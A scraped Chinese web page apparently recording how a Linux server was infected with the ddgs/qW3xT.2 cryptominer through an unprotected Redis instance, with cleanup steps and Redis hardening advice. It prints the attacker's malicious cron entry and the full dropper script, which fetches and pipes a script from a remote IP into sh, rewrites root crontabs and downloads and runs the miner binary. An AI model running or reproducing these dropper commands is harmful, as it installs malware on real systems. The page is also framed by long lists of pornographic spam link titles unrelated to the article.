婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄

linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄

熱門標簽:昆明外呼系統 臨汾電銷機器人費用 地圖標注需要提交啥資料入駐 400電話申請找哪家公司 七大洲地圖標注 地圖標注w是什么方向 河南省鄭州市地圖標注 福州呼叫中心外呼系統哪家好 新鄉人工智能電話機器人加盟

前言

隨著虛擬貨幣的瘋狂炒作,挖礦病毒已經成為不法分子利用最為頻繁的攻擊方式之一。病毒傳播者可以利用個人電腦或服務器進行挖礦,具體現象為電腦CPU占用率高,C盤可使用空間驟降,電腦溫度升高,風扇噪聲增大等問題。

本文主要介紹的是關于linux植入ddgs、qW3xT.2挖礦病毒的處理方法,下面話不多說了,來一起看看詳細的介紹吧

被入侵后的現象:

發現有qW3xT.2與ddgs兩個異常進程,消耗了較高的cpu,kill掉后 過一會就會重新出現。

kill 掉這兩個異常進程后,過一段時間看到了如下進程:

首先在/etc/sysconfig/crotnab中的定時任務沒有找到定時腳本,輸入crontab -e 在其中找到了該定時任務

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
<span style="font-size: 15px;">查詢了下149.56.106.215在美國,i.sh 腳本內容如下:</span>
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

處理方法:

1.刪除  crontab -e 中

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2.清除/root/.ssh/authorized_keys 中黑客設置的免密登錄內容

3.修改redis密碼

4.修改root與登錄賬戶密碼

安全建議:

1.配置bind選項,限定可以連接Redis服務器的IP,修改 Redis 的默認端口6379 配置認證,也就是AUTH,設置密碼,密碼會以明文方式保存在Redis配置文件中

2.配置rename-command 配置項 “RENAME_CONFIG”,這樣即使存在未授權訪問,也能夠給攻擊者使用config 指令加大難度

3.如果可以在防火墻中屏蔽redis外網      

入侵方式:

收集了相關資料,了解到其是利用redis漏洞,未設置密碼或密碼太簡單,導致的被入侵。具體方式可以參考

https://www.jb51.net/article/147375.htm

reids修改密碼方法如下:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##獲取當前密碼
config set requirepass "yourpassword" ##設置當前密碼,服務重新啟動后又會置為默認,即無密碼;

永久生效方法為,打開redis配置文件redis.conf,找到requirepass值修改密碼,如下:

requirepass yourpassword ##此處注意,行前不能有空格

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持。

標簽:岳陽 股票 四川 海口 鎮江 烏海 臨沂 紅河

巨人網絡通訊聲明:本文標題《linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄》,本文關鍵詞  linux,服務器,被,植入,ddgs,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄》相關的同類信息!
  • 本頁收集關于linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    日韩一区二区三区观看| 亚洲一区在线视频| 欧美日韩精品三区| 国产一区在线视频| 亚洲欧美激情在线| 99精品视频在线播放观看| 日韩av中文字幕一区二区三区 | 日本成人在线电影网| 国产精品伦一区二区三级视频| 欧美撒尿777hd撒尿| 色呦呦国产精品| 成人性生交大合| 国产91精品一区二区麻豆网站| 青青草91视频| 精品一二线国产| 日韩高清一级片| 精品亚洲成a人在线观看| 亚洲二区在线视频| 日韩精品一卡二卡三卡四卡无卡| 亚洲欧洲制服丝袜| 久久久精品tv| 亚洲色图视频网站| 亚洲美女免费视频| 亚洲综合色区另类av| 亚洲一区在线电影| 免费国产亚洲视频| 久久国产剧场电影| 成人丝袜视频网| 99久久精品一区二区| 91麻豆视频网站| 欧美亚洲国产怡红院影院| 欧美色窝79yyyycom| 欧美一级二级在线观看| 国产欧美日韩视频在线观看| 国产精品女主播av| 一级中文字幕一区二区| 亚洲一区二区美女| 国产综合色产在线精品| 成人av小说网| 久久综合丝袜日本网| 亚洲欧美国产77777| 另类小说一区二区三区| 97久久精品人人澡人人爽| 91精品婷婷国产综合久久| 国产三级欧美三级日产三级99| 1区2区3区欧美| 美女在线视频一区| 欧洲av一区二区嗯嗯嗯啊| 欧美日韩大陆一区二区| 国产精品久久久久久久久动漫| 天天免费综合色| 色天天综合久久久久综合片| 国产亚洲综合性久久久影院| 免费在线欧美视频| 制服丝袜中文字幕亚洲| 日韩毛片在线免费观看| 成人黄动漫网站免费app| 日韩欧美123| 国产精品综合在线视频| 日韩欧美中文字幕精品| 亚洲国产美国国产综合一区二区| 成人涩涩免费视频| 亚洲精品成人悠悠色影视| 99在线精品一区二区三区| 一区在线播放视频| 91亚洲精品一区二区乱码| 亚洲另类春色国产| 在线不卡a资源高清| 日韩激情一区二区| 精品国产一区二区国模嫣然| 麻豆成人久久精品二区三区红 | 色噜噜狠狠色综合欧洲selulu| 国产精品久久久久久久蜜臀 | 亚洲精品在线网站| 色综合色综合色综合色综合色综合| 91啪在线观看| 亚洲午夜久久久久| 日韩午夜av电影| kk眼镜猥琐国模调教系列一区二区 | 欧美久久一二区| 国产露脸91国语对白| 亚洲国产日产av| 337p日本欧洲亚洲大胆色噜噜| 丁香一区二区三区| 午夜欧美大尺度福利影院在线看| 精品粉嫩aⅴ一区二区三区四区| 高清在线不卡av| 久久精品国产成人一区二区三区| 欧美va亚洲va| 色哟哟在线观看一区二区三区| 亚洲成人免费观看| 一区二区三区在线视频观看58 | 亚洲欧洲精品天堂一级| 色美美综合视频| 国产精品亚洲午夜一区二区三区| 香蕉av福利精品导航| 中文字幕一区二区三区乱码在线| 日韩一区二区三区四区| 成人国产免费视频| 丁香桃色午夜亚洲一区二区三区| 亚洲成精国产精品女| 亚洲视频在线观看一区| 精品国产乱码91久久久久久网站| 欧美日韩免费在线视频| 91丨porny丨在线| 91免费国产在线观看| 国产成人小视频| 国产成人午夜精品影院观看视频 | 欧美日韩在线免费视频| 色偷偷88欧美精品久久久| av成人免费在线| 91女厕偷拍女厕偷拍高清| 成人国产精品免费| 色噜噜狠狠成人中文综合| 成人免费毛片高清视频| 成人妖精视频yjsp地址| 久久99久国产精品黄毛片色诱| 一区二区在线观看免费视频播放 | 中文成人综合网| 亚洲综合丝袜美腿| 久久精品国产精品青草| 日韩国产精品大片| 国产麻豆精品视频| 在线观看三级视频欧美| 欧美成人欧美edvon| 国产精品网站在线播放| 亚洲夂夂婷婷色拍ww47| 国产在线播放一区三区四| 在线视频综合导航| 日韩一区二区三区视频在线观看| 国产精品美女一区二区在线观看| 亚洲精品videosex极品| 国产激情精品久久久第一区二区 | 久久黄色级2电影| 色中色一区二区| 中文字幕欧美三区| 久久福利资源站| 精品视频在线免费| 亚洲欧美激情视频在线观看一区二区三区 | 亚洲一区二区av在线| 成人性生交大片免费看视频在线 | 久久久久久日产精品| 日韩精品成人一区二区三区| 91小视频免费看| 国产午夜精品久久久久久免费视| 亚洲国产日韩综合久久精品| jvid福利写真一区二区三区| 国产日韩精品视频一区| 国产精品一线二线三线| 久久久精品综合| 成人av在线一区二区三区| 亚洲一卡二卡三卡四卡五卡| 日本美女一区二区三区| 在线观看国产91| 调教+趴+乳夹+国产+精品| 欧美一区二区三区视频免费| 午夜视频在线观看一区二区| 91精品国产免费| 久久99这里只有精品| 国产亚洲美州欧州综合国| 成人性生交大合| 亚洲免费在线视频一区 二区| 色狠狠av一区二区三区| 日韩成人免费看| 国产精品成人午夜| 91精品蜜臀在线一区尤物| 精品一区二区三区影院在线午夜| 国产偷国产偷亚洲高清人白洁| 99久久精品免费精品国产| 日韩av中文在线观看| 中文字幕不卡一区| 欧美电影一区二区三区| 岛国精品一区二区| 日韩电影一区二区三区| 国产精品动漫网站| 久久精品网站免费观看| 欧美日韩情趣电影| 99久久婷婷国产综合精品| 日韩av一区二区三区| 中文字幕免费不卡| 91精品国产综合久久精品性色| 成人国产视频在线观看| 国产精品系列在线播放| 日韩福利电影在线观看| 中文字幕一区在线| 国产欧美日韩视频在线观看| 欧美一个色资源| 91精品黄色片免费大全| 国产精品99久久久久久久vr| 亚洲国产成人高清精品| 亚洲乱码国产乱码精品精可以看| 国产欧美1区2区3区| 久久久影视传媒| 日本一区二区三区高清不卡| www国产亚洲精品久久麻豆| 欧美va亚洲va| 国产拍揄自揄精品视频麻豆| 中文文精品字幕一区二区| 亚洲欧洲无码一区二区三区| 中文字幕乱码日本亚洲一区二区 |